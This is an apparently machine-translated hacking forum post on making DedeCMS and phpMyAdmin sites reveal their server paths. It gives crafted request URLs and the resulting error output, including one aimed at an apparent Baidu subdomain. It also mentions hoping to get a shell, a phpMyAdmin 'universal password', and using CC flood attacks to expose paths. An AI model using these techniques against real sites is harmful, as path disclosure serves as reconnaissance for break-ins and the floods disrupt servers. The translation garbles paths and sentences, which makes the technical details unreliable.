Dedecms burst directory method of webmaster Network
Http://chinaz.com/include/htmledit/index.php? Modetype = basic & height [] = airpig
Fatal error: Unsupported operand types in E: 2008. chinaz?dehtmleditindex. php on line 7
These are all exploitation of cms vulnerabilities.
Then let's talk about Phpmyadmin.
There are many
Basically, the phpmyadmin site 90% can be used to pop up directories.
The last time I remembered Baidu, I found it was really fast for the Administrator to change it.
Http://xxxx.baidu.com/...../phpmyadmin/libraries/export/xls.php
Warning: main (Spreadsheet/Excel/Writer. php) [function. main]: failed to open stream: No such file or directory in/home/work/local/apache/htdocs/phpmyadmin/libraries/export/xls. php on line 5
Fatal error: main () [function. require]: Failed opening required' Spreadsheet/Excel/Writer. php '(include_path = '. :/home/work/local/php/lib/php') in/home/work/local/apache/htdocs/phpmyadmin/libraries/export/xls. php on line 5
Pphpmyadmin/libraries/export/xls. php
Hpmyadminhemesdarkblue_orangelayout.inc.php
The directory is out. If phpmyadmin can use the universal password @, if the server is not properly set
It's a pity that Baidu cannot get in through shell ~~~
In addition to these conventional methods, some extreme methods were mentioned last time.
Attackers can use CC and other attack methods to drag cross-server traffic.
The path can be exposed.